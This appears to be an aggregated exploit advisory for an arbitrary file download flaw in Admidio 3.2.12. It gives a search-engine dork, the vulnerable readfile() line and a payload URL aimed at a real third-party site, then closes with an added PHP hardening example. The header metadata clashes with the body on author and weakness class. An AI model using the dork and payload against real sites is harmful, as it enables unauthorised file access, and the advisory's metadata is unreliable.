CVE | Category | Price | Severity |
---|---|---|---|
CVE-2018-11478 | CWE-534 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Shahmeer Amir | High | Remote | 2018-01-22 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N | 0.04145 | 0.52146 |
============================================================================================================================
| # Title     : Admidio 3.2.12 Arbitrary File Download Vulnerability
| # Author    : indoushka
| # Telegram  : @indoushka
| # Tested on : windows 10 Fr V.(Pro)
| # Vendor    : https://www.admidio.org/
| # Dork      : " 2004 - 2017 Admidio Team"
============================================================================================================================

poc :

adm_program\modules\photos\photo_show.php

line 105

readfile($ordner.'/thumbnails/'.$getPhotoNr.'.jpg');

[+] Dorking in Google or other search engine.

[+] use payload : modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1

http://www.cvjm-reutlingen.de/admidio/adm_program/modules/photos/photo_show.php?pho_id=0&photo_nr=1&thumb=1

Greetz : jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko 'LiquidWorm' Krstic
============================================================================================================================
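
One way to harden the readfile() call quoted above, as an added example that is not Admidio's code. It assumes $getPhotoNr comes from the photo_nr request parameter and $ordner is the album directory, which the advisory does not state; resolveThumbnail and sendThumbnail are hypothetical names.

```php
<?php
// Added example, not Admidio's code. Function and parameter names are hypothetical.

// Return the real path of <albumDir>/thumbnails/<photoNr>.jpg, or null when the
// input is not a plain number or the resolved file lies outside that directory.
function resolveThumbnail(string $albumDir, $photoNr): ?string
{
    // Digits only: rejects dots, slashes, NUL bytes, signs and arrays.
    if (!is_string($photoNr) || !preg_match('/\A[1-9][0-9]{0,5}\z/', $photoNr)) {
        return null;
    }
    $base = realpath($albumDir . '/thumbnails');
    if ($base === false) {
        return null;
    }
    // realpath() resolves ".." and symlinks, so the prefix check sees the final target.
    $path   = realpath($base . DIRECTORY_SEPARATOR . $photoNr . '.jpg');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || !is_file($path) || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function sendThumbnail(string $albumDir, $photoNr): void
{
    $path = resolveThumbnail($albumDir, $photoNr);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    header('Content-Type: image/jpeg');
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Constructed check, run from the CLI: one valid number, two rejected inputs.
if (PHP_SAPI === 'cli') {
    $album = sys_get_temp_dir() . '/album_' . bin2hex(random_bytes(4));
    mkdir($album . '/thumbnails', 0700, true);
    file_put_contents($album . '/thumbnails/1.jpg', 'constructed image bytes');
    file_put_contents($album . '/outside.jpg', 'must not be served');
    var_dump(resolveThumbnail($album, '1') !== null);   // file inside thumbnails/
    var_dump(resolveThumbnail($album, '../outside'));   // fails the digit check
    var_dump(resolveThumbnail($album, '2'));            // no such file
}
```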